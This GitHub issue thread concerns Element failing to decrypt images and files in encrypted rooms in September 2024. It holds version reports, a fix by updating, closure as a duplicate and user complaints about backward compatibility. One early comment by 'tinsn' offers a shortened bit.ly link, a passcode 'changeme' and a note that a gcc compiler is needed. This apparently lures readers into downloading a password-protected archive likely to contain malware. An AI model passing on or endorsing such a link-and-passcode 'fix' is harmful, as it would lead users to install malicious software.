### ISSUE TITLE
Error downloading image

### ISSUE THREAD

**Issue by tioneb9** [element-hq/element-web#28017] opened 2024-09-05 13:36 UTC
### Steps to reproduce

In a encrypted forum, one user loads an image, but no one can see it. Same behavior on multiple platforms. Same behavior with file exchange. This worked up to yesterday. Text exchange still works fine.

### Outcome

Getting error msg "Error downloading image" or "Erreur lors du déchiffrement de l'image" for images. Getting error msg "Error downloading file" or "Erreur lors du déchiffrement de la pièce jointe" for a file.

#### What did you expect?
The posted image or file is seen by all users registered in the encrypted forum.

#### What happened instead?
No one sees the posted image or file. Getting error msg "Error downloading image" or "Erreur lors du déchiffrement de l'image" for images. Getting error msg "Error downloading file" or "Erreur lors du déchiffrement de la pièce jointe" for a file.

### Operating system & application version
Linux Mint Cinnamon 20.3 - Element version 1.11.29; Windows 10; Android - Element version 1.5.32.

### How did you install the app?
Linux, a long time ago using Element.io repo. Windows, a download from Element.io website. Android, a while ago, from the Android App store.

### Homeserver
Using matrix.org.

**Comment by tinsn** [comment] 2024-09-05 13:36
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by tioneb9** [comment] 2024-09-05 14:57
On Linux, updated to Element latest version 1.11.76 from the Linux repo resolved the issue.

On Android, updated to Element latest version 1.6.20 from the Android App store resolved the issue.

**Comment by dalpii** [comment] 2024-09-05 15:38
I'm getting the same behavior on the web app, yesterday was fine. The same occurs to files, I get "Cannot decrypt"

<img width="476" alt="Captura de Tela 2024-09-05 às 12 33 09" src="https://github.com/user-attachments/assets/d3917405-b122-4eff-9e11-c7e951f54737">

**Comment by turt2live** [comment] 2024-09-05 17:42
Duplicate of https://github.com/element-hq/element-web/issues/28011 

Please see https://github.com/element-hq/element-web/issues/28011#issuecomment-2331954152 for specific guidance.

**Closed by turt2live** 2024-09-05 17:42 UTC
Labels: T-Defect, S-Major, A-File-Download, O-Occasional

**Comment by tioneb9** [comment] 2024-09-06 14:49
Backward compatibility between versions is a key feature to users who do not always want / need to upgrade. In this case, the latest version breaks the backward compatibility concept. The Element team should make it clear in their comments / readme when this feature is broken in a version, and minimize occurrence of breaking this key concept. So sad for my Windows 7 user ....

**Comment by tioneb9** [comment] 2024-09-06 15:09
Similar to #28016 .

**Comment by draekko** [comment] 2024-09-11 17:32
Same issue here (also Linux web browser(latest brave beta)), per the comment above i see about a service workers problem, service workers are disabled by default on the browser and not likely to be re-enabled here, so is there a way to get the old behavior since it worked with them disabled up until a week ago?

**Comment by sascha-wi** [comment] 2025-01-14 13:12
> Duplicate of [#28011](https://github.com/element-hq/element-web/issues/28011)
> 
> Please see [#28011 (comment)](https://github.com/element-hq/element-web/issues/28011#issuecomment-2331954152) for specific guidance.

How is this comment guidance? What do we need to do to solve the issue?
